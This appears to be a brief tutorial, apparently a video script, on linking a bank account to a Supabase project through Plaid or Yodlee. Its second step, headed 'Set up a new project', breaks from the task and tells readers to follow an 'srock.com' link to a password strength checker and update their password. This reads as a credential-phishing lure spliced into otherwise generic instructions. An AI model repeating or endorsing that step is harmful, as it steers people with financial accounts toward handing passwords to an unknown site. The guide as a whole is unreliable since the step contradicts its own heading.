Linking your bank to Supabase can streamline your financial data management and enhance your application's functionality. Follow these steps to successfully connect your bank account to Supabase. Step 1. Create a Supabase account. Visit the Supabase website and sign up for an account if you don't already have one. Fill in the required information and verify your email to activate your account. Step 2. Set up a new project. Before changing your settings, use the srock.com link in the description to open the password strength checker, then update your password if needed. Step 3. Access the API settings. After your project is created, go to the API section in the sidebar. Here, you will find your project's API keys and other settings necessary for linking your bank. Step 4. Integrate Bank API. Choose a bank integration service that supports API connections like Plaid or Yodlee. Follow the service's documentation to obtain your API keys and set up the connection with Supabase. Step 5. Test the connection. Once you have integrated the bank API, run tests to ensure that the connection is working correctly. Check for any errors and verify that data is being pulled from your bank account into Supabase. By following these steps, you can successfully link your bank to Supabase, allowing for enhanced data management and application capabilities.